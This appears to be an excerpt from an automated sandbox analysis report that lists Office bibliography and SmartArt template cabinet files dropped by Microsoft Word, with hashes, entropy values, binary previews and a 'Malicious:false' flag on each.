                                                                                                                                                        Preview:MSCF....K=......L...........................K=...?..................q<......................gb.xsl.................Content.inf.EF/.....[...A....3D.4..oVP!i/......t.6..l&9r0.8......c..q.^........$/..(./H ...^_Z0\4.42WU......P.F..9.._....'.D..<H@..E.b,K..9o..wo..v|..[.{7m.......|}aI..|g....IF2au?.1,..3.H.......ed....-.........m....$..8&0..w........2....s....z..d.Z.e.....@$r[..r..4...."E.Q@...Hh.B"b>...$.L.$.P.._..~.?./T..@..F..?.~G...MS..O%Z3*k..:..._...!GF..U...!..W..$..7...j......xy0..../.j..~4......8...YV....Fe.LU..J.B.k%BT5.X.q.w.a4....5..r...W.6.u...]i...t.....e.\.K............#t.c5.6....j...?#..{.m3.L9...E/....B[R.k(.'....S.'.}!j.tL..v....L....{<.m4......d_kD..D.....4`aC....rg..S..F.b..^........g;.`?,......\..T.\.H.8W.!V...1.T1.....|.Uh....T..yD'..R.......,.`h..~.....=......4..6E..x#XcVlc_S54 ..Q.4!V..P...{w..z.*..u.v....DC...W.(>4..a..h.t.F.Z...C.....&..%v...kt....n..2....+.@...EW.GE..%.:R`,}v.%.nx.P.#.f.......:.5(...]...n3{...v........Q..

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7D92.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):21875
                                                                                                                                                        Entropy (8bit):7.6559132103953305
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:k73HRpZA6B3ulrnxtRT7G8E0GftpBjEdHqlFLrHRN7uhFlvQyUTL2m4c:k7XRgIkrG8Pi6dmuNvU+mp
                                                                                                                                                        MD5:E532038762503FFA1371DF03FA2E222D
                                                                                                                                                        SHA1:F343B559AE21DAEF06CBCD8B2B3695DE1B1A46F0
                                                                                                                                                        SHA-256:5C70DD1551EB8B9B13EFAFEEAF70F08B307E110CAEE75AD9908A6A42BBCCB07E
                                                                                                                                                        SHA-512:E0712B481F1991256A01C3D02ED56645F61AA46EB5DE47E5D64D5ECD20052CDA0EE7D38208B5EE982971CCA59F2717B7CAE4DFCF235B779215E7613AA5DCD976
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF....c.......D...........................c....?..................................ThemePictureAlternatingAccent.glox.................Content.inf...3.....[.... .qq...........\<.^......o."......f.o...x.{..q..^.MH^...........{0.K....4pX.i...@6A4X.P.01d....'p.......zA.......... .......7.......a. `.=!@- ......>G.s.k~@.a.lfha:m....1...@.,G`....{....W..N..qs.......j.+TrsT.l.9..L...1+...d..-u..-.......).#u&...3......k.&C...DdZ.'.......8..<PF..r.eq.X6...u..v...s5.m.Q.l.G%.<.]....RV<...S..Dv..s.r.......dh.N.3-.Hf'.....3.GZ..E.kt.5......h...|...?!.L....~.)..v....:2.../F.,....o.qi.i7..E.|.mh.R_.@A.FO@i.....Feo...x.l...{E.\W9|V...=#..3..(......tP.:i....Ox.U.N...%6...p.6&.....<zh.z.|.<Z.?.k....y7m...F.Z$-.:.l.h...{T..7....?..T...d,r...z?../...`/Z......a.v@)....u......V..v.:.._.|.'..[..O.s.OAt-."b.In"..I...J*.~H.:-...?..uV....dZ;z:.l.{.E.,.Q..i]:.0r.I.y..f...../j.wN...^R.....u....>..}....f.f...]A..C~;/....%..^#..N.a..........99.....`.....%..iS....S......$....)

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7D93.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):23597
                                                                                                                                                        Entropy (8bit):7.692965575678876
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:y6aR//q0bJi/Uj+957G8E0GftpBj/4YOFLrHRN7LxhKll7PK/ph:y6I/Li/UjmVG8PiZ4YsLxh6Ih
                                                                                                                                                        MD5:7C645EC505982FE529D0E5035B378FFC
                                                                                                                                                        SHA1:1488ED81B350938D68A47C7F0BCE8D91FB1673E2
                                                                                                                                                        SHA-256:298FD9DADF0ACEBB2AA058A09EEBFAE15E5D1C5A8982DEE6669C63FB6119A13D
                                                                                                                                                        SHA-512:9F410DA5DB24B0B72E7774B4CF4398EDF0D361B9A79FBE2736A1DDD770AFE280877F5B430E0D26147CCA0524A54EA8B41F88B771F3598C2744A7803237B314B2
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF............D................................?..................................pictureorgchart.glox.................Content.inf.W..y....[.............../.jC....U.CUUUTU.5...jjPU..MP....T..0*....o0.......Y.=....P.({.3.p..."pA!>r../3.q..7...........!...TO....(..%......6...3E?....~......CZmndse.Qy....p....h....=.:5...F..%.E.&.v.`I~. ..%._..b]..Y..Q..R.........nN.q8c..a..L..X/.M...PP.q..SpZ.K]>D"Pf..B.c....0..|I.Q.,.g/..Kev.../..=......w..}3.....(....+#T.....K`N.u..Z.....rriK.(...(...6.<R.%.]..NX..b..].C.u....++......Ia.x. .7....J.#............w>....7..R...H>....@%....~.yA.......~.UB..*. .P..$...-...v.....=M."....hw..b....{.....2pR....].C..u@=G."Y..;..gc/N.N.YB.Z.q.#....$....j.D.*.P..!.)S.{..c....&'E.lJ%.|O.a...FG.|.....A..h.=c7.)d.5...D...L...IQ..TTE.*NL-.*M..>..p0.`......m..,.w#rZ..wR\@.Wn..@Q...}..&...E...0K.NY....M.71..`.M./:.>..._L..m...,U.l....._fi...nj9..,..w.s.kJ.m.s.M.vmw.!.....B.s.%.-').h.....)c.l....F..`3r...-.....0..7..&N.....n.#H...<7

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7D94.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):31482
                                                                                                                                                        Entropy (8bit):7.808057272318224
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:LgHv7aLOcoLGQ4EykdrHwLa+A8Pi6Iv8ACIa:LwvWyx4EykdTwLaWP7I0ACIa
                                                                                                                                                        MD5:F10DF902980F1D5BEEA96B2C668408A7
                                                                                                                                                        SHA1:92D341581B9E24284B7C29E5623F8028DBBAAFE9
                                                                                                                                                        SHA-256:E0100320A4F63E07C77138A89EA24A1CBD69784A89FE3BF83E35576114B4CE02
                                                                                                                                                        SHA-512:00A8FBCD17D791289AC8F12DC3C404B0AFD240278492DF74D2C5F37609B11D91A26D737BE95D3FE01CDBC25EEDC6DA0C2D63A2CCC4AB208D6E054014083365FB
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF.....;......L............................;...?...................;......................gosttitle.xsl.$...............Content.inf....v....[...=..Ic.32.E...`o.............m....4uk[.,.......{...}k{.R@(Hq..68nv...@.D.....$...j....8Q..........8.8........3...*.bi?Wt...:(..J.;&eii..io.w..z...`.'..i.MLR@.>....N..3`P.>$X@(r.#.D..(....P"_..I.$o.. L!y...I...H.........{.{....{.3....7..w..{w.2sn.dYn.lW...l...c$.UH....L6. .D$$...!F.!... .D............_..'.`.Q.v>..Z..f.n.l....0o.......bK...?s..eO....'.>t......S'..........~....h...v&7:q.x9|qs...%....:..D...ag.....e..'...".A.Y..?w"....p1t.9J.~.4.........~vj.n.8.;.O......../.}..io{p...e...\m.d`.gAm.......1"...N*...8..g"......~..[.e+.....\6i4.....%...Rq.U-p?..4P..4.f.?N.vI?.M\i.;.s..E.L.hu.*...\..5....N......]......\`...rS.\g.....2..!a).?.l.!i.^.t.u...x...g/.A..v.E...\.@.>kM...&.g.....%.......{.....2..E.g...'..[w...N.w..& 4M.a.cu.%:...\.D..Q..C.'fm..i....@._......QI.. ....h..|fB.il.(`..h.d;.l...`.s:

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7D95.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):31605
                                                                                                                                                        Entropy (8bit):7.820497014278096
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:7SpOUxgQ9gFodHZktfHa2TSmcAg76j8/xorK0JoZgbA8E0GftpBjE2PzFLrHRN7S:OngHltf7Bcp/xoB3A8Pi625D8RA54
                                                                                                                                                        MD5:69EDB3BF81C99FE8A94BBA03408C5AE1
                                                                                                                                                        SHA1:1AC85B369A976F35244BEEFA9C06787055C869C1
                                                                                                                                                        SHA-256:CEBE759BC4509700E3D23C6A5DF8D889132A60EBC92260A74947EAA1089E2789
                                                                                                                                                        SHA-512:BEA70229A21FBA3FD6D47A3DC5BECBA3EAA0335C08D486FAB808344BFAA2F7B24DD9A14A0F070E13A42BE45DE3FF54D32CF38B43192996D20DF4176964E81A53
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF....e<......L...........................e<...?...................;......................gostname.xsl."...............Content.inf.[.......[...>..|..32.E..o`h....W.>.^...v..5...m.w.$.U..U......m.mu...'4....m`.9F.. ...I..PTS..O.D...GM#...#CUE.`.`%n..N...G,.~..+.6cv.L...G.m.Y..vy.....Yh9/.m,..wtw..;....Ka.a.{.\...'.....<X....%)...G..d......R./..4$..32..@....f.h....w..ov.}w..[.....{.v.......dr..&w#G..$3.zI&f..(C..L.z5J... .`...!.!4. ...!.` .$........w.J.X7.w_..@.w..f]=.C.....I-....s.s_.x...~..A... ...z...nM..;....Z....vt....6...~.w.....*x.g.h.T.J..-.3=....G.n..ti.A...s...j$.Bf..?......6.t.<j...>.."....&=BO?w.uN.o.t.-r..K....>C..^G..p...k...>.xZ.[fL..n.."].W#...|.i.0W.q.F: ..<#w......w....s....."...n.qu.../rI.....q....P~.B..|b?.N.}..MyO..q..:q.7..-~.xa.S...|.....X.....g.W.3.mo..yy.GG.s>....qy....r........#.F.P..A.......A....b.2..14.8.i6..w.S...v~{0z.<.Z...^!.;2mSV.i....{...U...+...r.;...h.++..T6.a...$....j5F+..1t....b......|.Q\d-.S..2... ......Y..A...s....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7DA6.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):34816
                                                                                                                                                        Entropy (8bit):7.840826397575377
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:i3R9VYnIYfPYmqX0CnF1SRHVnLG8Pi61YbEIFO:ih9VjYfPYlk+F1SJxP71YbEIFO
                                                                                                                                                        MD5:62863124CDCDA135ECC0E722782CB888
                                                                                                                                                        SHA1:2543B8A9D3B2304BB73D2ADBEC60DB040B732055
                                                                                                                                                        SHA-256:23CCFB7206A8F77A13080998EC6EF95B59B3C3E12B72B2D2AD4E53B0B26BB8C3
                                                                                                                                                        SHA-512:2734D1119DC14B7DFB417F217867EF8CE8E73D69C332587278C0896B91247A40C289426A1A53F1796CCB42190001273D35525FCEA8BA2932A69A581972A1EF00
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF.....H......L............................H...?...................G......................APASixthEditionOfficeOnline.xsl.H...............Content.inf..h;.....[...Q..\..3S.5..oVP!i/Z.Ls...]q$...xY..+W.qm..B..y/.5.s..x$../K./.x.$.....}.......\........LNf..Hd.&."Ip.L.Mr-@.D..kW~i...^.....F.....T.U....../..0..2.{.q.T.`'{.00.{.B...>.R..2....1.~_.f..s...........~....~[..v..w..v....$[K.r$#[6...d;[...#.9.-...G..Z..eAR.0")%JI?&....$..$.H..$(........f.> k....hP...p...!j.T......l7..../3..(2^V...#..T9...3.@[0...le:...........E....YP.\.....au1...\.S|..-.duN.Z..g.O......X8....1.....|,.f/..w.|Wk]zJz.g'./7h..+.....}............x....s.2Z\..W.{...O....W.{j.U..Q....uO=.p.M k.E.S{SUd.@....S.Syo8>......r......8..............Z?>.mUAg....?o....f.7..W.n...P..........d.S?...\..W`...c.ua..........#.Y...45...F(d.o\09^..[.}...BsT.SD..[l.8..uw.7l..S.9T.KR..o......V..]...M .....t.r...:P...M....4.F.....@..t.1t..S...k.2.|5...i.%H..<.J..*.0n.....lZ.....?.*?.~..O .)..

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7DA7.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):22340
                                                                                                                                                        Entropy (8bit):7.668619892503165
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:GByvLdFHny7G8E0GftpBjE8upFLrHRN778lvQyUTL2mm2y:Oy3HkG8Pi6887mvU+ma
                                                                                                                                                        MD5:8B29FAB506FD65C21C9CD6FE6BBBC146
                                                                                                                                                        SHA1:CE1B8A57BB3C682F6A0AFC32955DAFD360720FDF
                                                                                                                                                        SHA-256:773AC516C9B9B28058128EC9BE099F817F3F90211AC70DC68077599929683D6F
                                                                                                                                                        SHA-512:AFA82CCBC0AEF9FAE4E728E4212E9C6EB2396D7330CCBE57F8979377D336B4DACF4F3BF835D04ABCEBCDB824B9A9147B4A7B5F12B8ADDADF42AB2C34A7450ADE
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF....4.......D...........................4....?..................1...............ThemePictureGrid.glox.....1...........Content.inf....K..5.[.... V.q......B.....?.h.i.J.D...Z...>.....i~...A...Z....H.hy.D..X.....>...L.I..`. z w0}.K`.C{h....W\../.U..p\%...B...;............9..8.^M.....].lP.p...|..?..M....E..S.`..-n........Q'.'.o..C}=..?`.bQ...J"0f.. ....k3n..F.Pu..#...w].`<...."D.].-.#+):..fe..=<.M...4..s.q.f._.=.*T.M..U.[R.kbw.,......t6_I...~.X..$_.q....}2..BR...).[...<.l.3........h%....2.$`>..hG...0.6.S......._3.d~1.c.2g....7tTO..F.D.f.Y..WCG.B..T....Gg&.U'....u.S/......&6w..[bc.4....R.e..f.,....l."........I....J.=~...$x.&2...+,-.;.v.'.AQ.fc...v._..rZ..TYR...g?..Z..!.3mP dj...../...+...q.....>..../...]P.z?DW&.p..GZ....R5n......,..]{].0m.9...o.{...e."...8VH....w"%;.g\.K..p.}....#r.u..l.vS...Y.7U.N*-E@.....~....E...x.....C.......{NP....5Ymk.*._.K...Z...f..;.......b.....,._@B..\.S..d.'\rs..].}.5"XJU.J..'.zk}.+P.)C.X.?9sx.D....(K....P^N_D...Z.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7DA8.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):31562
                                                                                                                                                        Entropy (8bit):7.81640835713744
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:yhsBScEWkrljntbzuMmWh7ezPnGgbA8E0GftpBjohgsRFLrHRN7ybll7PK/p:MsBScwtnBmWNeTzA8PiuWsvyDI
                                                                                                                                                        MD5:1D6F8E73A0662A48D332090A4C8C898F
                                                                                                                                                        SHA1:CF9AD4F157772F5EDC0FDDEEFD9B05958B67549C
                                                                                                                                                        SHA-256:8077C92C66D15D7E03FBFF3A48BD9576B80F698A36A44316EABA81EE8043B673
                                                                                                                                                        SHA-512:5C03A99ECD747FBC7A15F082DF08C0D26383DB781E1F70771D4970E354A962294CE11BE53BECAAD6746AB127C5B194A93B7E1B139C12E6E45423B3A509D771FC
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF....:<......L...........................:<...?..................D;.......V..............harvardanglia2008officeonline.xsl.L...............Content.inf.Vu......[...E..o..3D.5..nF.A..+.e.....6r..f........M3...-.s.m.... $r.b.!.q!.....G...0.\.......fd......%m...'1Y..f..O...*.#.P.,{..m...|..ww.{.m...f...n%...,..y...0y...8.Q...`.../.q....a...',.V......8.7..8t..................6.]..6..nw..ynm..-l.Y..,.I?..$....+b9$E!S@"..) .4........H...lA...@!a.F.l$..0#!.....n&.5j.t+..1f|.+....E.zDk.l8.+<q.^.........\5.l..iT.9...........Y..6.^,.o.bn.E*5w..s.../...W.gS..j9..'W.F......].4\Mzz..Td..Ho..~.Q...Z..D..O.JP..m..s.j.:..........y._.....#.*.rD....60.\!y........p.o3,..Ub,......[[L.{.5.....5.7UDB9.{;;g.z.z..jM.G.MY.oe.....(r..B6..CV.7Fl.Z/....-.O.vY.c...-..........b.T)3.u..f~x2.?.8.g.x.-.....Qt_...$e.l..jtP..b....h..*.sW0.`.....c...F_....t.........LC..*5I.X$^.;&....#.._\J..........;..wP..wX.qy.qs...}46..fK.XN.&0........k1....8...............'t.......}.......O_.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7DA9.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):35519
                                                                                                                                                        Entropy (8bit):7.846686335981972
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:2LFougzHaUdBKUsM+Z56zBjA8Pi6bo+ld8IX:MFodzHaULR9P7bo+l6IX
                                                                                                                                                        MD5:53EE9DA49D0B84357038ECF376838D2E
                                                                                                                                                        SHA1:AB03F46783B2227F312187DD84DC0C517510DE20
                                                                                                                                                        SHA-256:9E46B8BA0BAD6E534AF33015C86396C33C5088D3AE5389217A5E90BA68252374
                                                                                                                                                        SHA-512:751300C76ECE4901801B1F9F51EACA7A758D5D4E6507E227558AAAAF8E547C3D59FA56153FEA96B6B2D7EB08C7AF2E4D5568ACE7E798D1A86CEDE363EFBECF7C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF.....K......L............................K...?...................J.......@..............turabian.xsl."...............Content.inf._.......[...T.....C4.5...E0B.]...+.-f....rc.[52.$...a..I....{z...`hx.r...!.. $...l..\....#3EF..r..c;<p...&n.\b..K..0Y..c+.2...i..B..wwY..77,...........}.q.C.......n..,.....prrx.QHy.B#..,.'....3....%1.``..hf...~...[.[n.v.s..y.vw....;..s.G293G&H....$E......m.&^..iy/.4.C...D...".(H&..&.I4._...!...... ........q.k1.d.....qc.3.c.....;.5.......y}...}&...+.WAN.,zVY.Q....V.Tz........g..H..c...E2jY...4g?.yf<....V.M.s.$..k.Id....+..?..._.\.s.k..9..I%;.yWQ..S..]..*.n<.7........=......"Q.*E.....MG..j.Yt..!U....Q.j...v.h-.~b..e&.......;...\.....:.....=..Xv1&q........6\...xw.%*.VdS..H...o...s.....+..%[../>.t..I....F.....".G|.....=....[..S..3..a.C.ZZ...tK.6N..b........)>........I..m..QE.M.nv.MVl.....vCG>,.suP.gqo.rr....J`m....J.b..},[F*....e.A.]..r....C4.?JJs6..l.].9...Q.B.~.......\d%.X ...8A....rH....&?#...^.....4.h.{>

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7DAA.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):25314
                                                                                                                                                        Entropy (8bit):7.729848360340861
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:75V23GNhfG/YvmBqWDP7G8E0GftpBjEB1vrFLrHRN7mKll7PK/pRU0:LS/Yvc7TG8Pi6BLm6IS0
                                                                                                                                                        MD5:C47E3430AF813DF8B02E1CB4829DD94B
                                                                                                                                                        SHA1:35F1F1A18AA4FD2336A4EA9C6005DBE70013C7FC
                                                                                                                                                        SHA-256:F2DB1E60533F0D108D5FB1004904C1F2E8557D4493F3B251A1B3055F8F1507A3
                                                                                                                                                        SHA-512:6F8904E658EB7D04C6880F7CC3EC63FCFE31EF2C3A768F4ECF40B115314F23774DAEE66DCE9C55FAF0AD31075A3AC27C8967FD341C23C953CA28BDC120997287
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF.....#......D............................#...?...................#..............InterconnectedBlockProcess.glox......#..........Content.inf...<.:#.$[......O..........5f.P.5CU..6..jT..U..U..UM.T.........h................-... .......6...`.....G...........'.,DN:........... "..4..1u.....%.u..{{,....@lp..}..`.......Z...K.....Z..... Z4.<?..C.BF.....k.!Hl...]...Tvf..g....)...vny6.'..f....Z.R.`.......+....!..!.....:..4fj....."q..f..E..^!k.....M.c....R...B......g...~.........o.'.7,.e.,..7.R.e,(.+..+:....Q....f...P.H.I..U.....Jl...l...z.]7...C...<...L.,..@...i.{..e]K...2..KRW..7.-'.G.l!.n7..J.v.C...%/.....q...@..l..e..$..N..sg8]oo.(q(_.?.X.s...Ua..r0...Rz.o.eT.j...b*..}",n.qou..M.[.;%../c.x.4.z.2*.U.]..D...h...-R.$.=\3..P......N.mP......J...}BPn...g]d.5k..C.ee.ml...\.g...[.......<..6$.%.I#S9..I...6.i........_..P.n....c$.3..zw.hF......_{.+...o...[.&........&...M..m.....;....0....D7...4nQ.=/.._`._.nh.D.m..h.+....8..p..q.4.w.\...iy...*...lN6F..c.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7DAB.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):30957
                                                                                                                                                        Entropy (8bit):7.808231503692675
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:rKfgT03jNkAFbgUQWtxq9OGh1bBkd/1MVHb5iVOdMgbA8E0GftpBjEl8tFLrHRNF:r303jOrUQAkfhopWHbA8Pi6l8zuUIq
                                                                                                                                                        MD5:D3C9036E4E1159E832B1B4D2E9D42BF0
                                                                                                                                                        SHA1:966E04B7A8016D7FDAFE2C611957F6E946FAB1B9
                                                                                                                                                        SHA-256:434576EB1A16C2D14D666A33EDDE76717C896D79F45DF56742AFD90ACB9F21CE
                                                                                                                                                        SHA-512:D28D7F467F072985BCFCC6449AD16D528D531EB81912D4C3D956CF8936F96D474B18E7992B16D6834E9D2782470D193A17598CAB55A7F9EB0824BC3F069216B6
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF.....9......L............................9...?...................8......1P..............iso690nmerical.xsl.................Content.inf...A@...[...5.....33.E...P.../..........5sv.]3srm8.T.=.......}.v.T.. ..4IH.r.%Z.(.q.\+K..[,....E....A......#CEF..}p..Y/s$...YKI.#M.?.t.1#C....I..v.vn...-...v7../S.m.Ma.....!.Y....4.......3.3....c&R9..%......(J..BDMI.>7J.....".....}.w.}w.wg.v...^.n.{....{f.mlI..%.#..I..S....D..QJ U......4........K.(@....DH.....}...8;..z...&0%e..G.OAM..x.3......\....zS9....}......89.B...e.W.p{;.....m.m3...}....../...q.~..;.,..".j.g..^N............iC.../|...g.=..9.Q].Gf.....QA....74..v.....9.n[......0.}..jo{y./.2..Ym......;u...b.(Jz^.....~..uM...{s../..#.)n2..S.S.c..6)U.V....!.'R.......P.S.D..S.p/......D.......{......?.u.",...Mp._....N..+..=Y#..&0w....r.......$.xwC......P.e7.>O....7....].y%q^S'....*.C.`.?..}Q..k../u.TK...y........S...{T.?......[.H.'L..AS.Y.|*..b...J.H-.^U>'9..uD[.".b[.l.......o..6.L).h.B0RJa.b..|m:.):......F

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7DAC.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):31083
                                                                                                                                                        Entropy (8bit):7.814202819173796
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:0XbSq3W46TVZb5fOFo1HtZwGqtRT44hS+nyBoiuFgbA8E0GftpBjEcBFLrHRN7Ku:0XpOflfOFo1DMr/iuuA8Pi6cfKjW66b
                                                                                                                                                        MD5:89A9818E6658D73A73B642522FF8701F
                                                                                                                                                        SHA1:E66C95E957B74E90B444FF16D9B270ADAB12E0F4
                                                                                                                                                        SHA-256:F747DD8B79FC69217FA3E36FAE0AB417C1A0759C28C2C4F8B7450C70171228E6
                                                                                                                                                        SHA-512:321782B0B633380DA69BD7E98AA05BE7FA5D19A131294CC7C0A598A6A1A1AEF97AB1068427E4223AA30976E3C8246FF5C3C1265D4768FE9909B37F38CBC9E60D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF....[:......D...........................[:...?...................A..............CircleProcess.glox......A..........Content.inf......9.B[.....@*........!...(A.D..K.W.wwpwJj\.K\w...]...K.!.....@0..?,...}won`... ....&I..(;.....X.u..^.R..^......_:....W>f\....T...B..i`|q.....................i.5....(........0q7@.@..F...?A.`.....,L.......5.+../56..a`....1C5..9.*I.N.......@|<+./......... .ya....>l.,t.......y.y5...FF.,F..jCA...SA..H....8u.L..eM?.w8.......~^.Mr.[...(.._......u..+.......j..TJ.:<.3.X`...U.bz...[...r-...[...+..B.......}...\'.i...C.8.B_...c.8</..s.....VQ.Y..m.,.j~;y ...2.5.VQ...K..jP..2..r-...HA...."..9).7.....5.E._.wq.......!.+n+.f...s].4M'.1&...5....4..k..NV.M1.7`a..<.P4.|.mrd.i.R...u...............v.}..n\.C$.....[..2c.^..W..g..._.0.C.o....%.z.!.;.@y.`\..UO#i.)...Q...........L. .\:_..H.{.W...@...T.4..A.a...Wo?o$4.....#.V.s8M.Gh..p?A...Y.....)...........r|...!..o9...8..%#.[....;...3<Z...g....~.Z....,.(...qA.'x#..xC..@...HOuW.[.[....c.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7DAD.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):20554
                                                                                                                                                        Entropy (8bit):7.612044504501488
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:zEAH676iPi8+IS5iqn7G8E0GftpBjExDxIHFLrHRN7Ke/ll7PK/pGaz6:zEhG8+ISrG8Pi6xDxCKoIGaz6
                                                                                                                                                        MD5:486CBCB223B873132FFAF4B8AD0AD044
                                                                                                                                                        SHA1:B0EC82CD986C2AB5A51C577644DE32CFE9B12F92
                                                                                                                                                        SHA-256:B217393FD2F95A11E2C594E736067870212E3C5242A212D6F9539450E8684616
                                                                                                                                                        SHA-512:69A48BF2B1DB64348C63FC0A50B4807FB9F0175215E306E60252FFFD792B1300128E8E847A81A0E24757B5F999875DA9E662C0F0D178071DB4F9E78239109060
                                                                                                                                                        Malicious:false
